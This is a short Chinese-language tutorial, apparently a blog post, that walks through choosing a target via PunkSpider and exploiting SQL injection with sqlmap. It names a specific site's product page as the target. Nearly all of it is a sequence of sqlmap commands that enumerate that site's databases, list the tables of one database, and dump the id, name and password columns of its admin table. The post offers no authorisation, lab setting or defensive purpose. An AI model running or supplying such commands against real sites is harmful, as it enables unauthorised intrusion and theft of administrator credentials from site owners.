1、浏览器打开punkspider——.net(后缀)——目标(选定):
2、复制到浏览器——搜索关键字:
3、锁定目标——漏洞地址还有很多:
4、打开——sqlmap工具:
5、第一段代码获取数据库:sqlmap -u http://www.cnshops.net/view_product.asp?proid=21604 --dbs(linux下)
6、第二段代码获取获取表:为大家直观理解(用window下sqlmap工具操作):python sqlmap/sqlmap.py -u http://www.cnshops.net/view_product.asp?proid=21604 -D juhua_web --tables(window下)
7、第三段代码获取获取列:python sqlmap/sqlmap.py -u http://www.cnshops.net/view_product.asp?proid=21604 -D juhua_web -T admin --columns
8、第四段代码获取字段:(跑要很长时间....)python sqlmap/sqlmap.py -u http://www.cnshops.net/view_product.asp?proid=21604 -D juhua_web -T admin -C id,name,pwd --dumpwindow下sqlmap跑起来速度不咋地.....
9、linux下sqlmap工具用法简介:
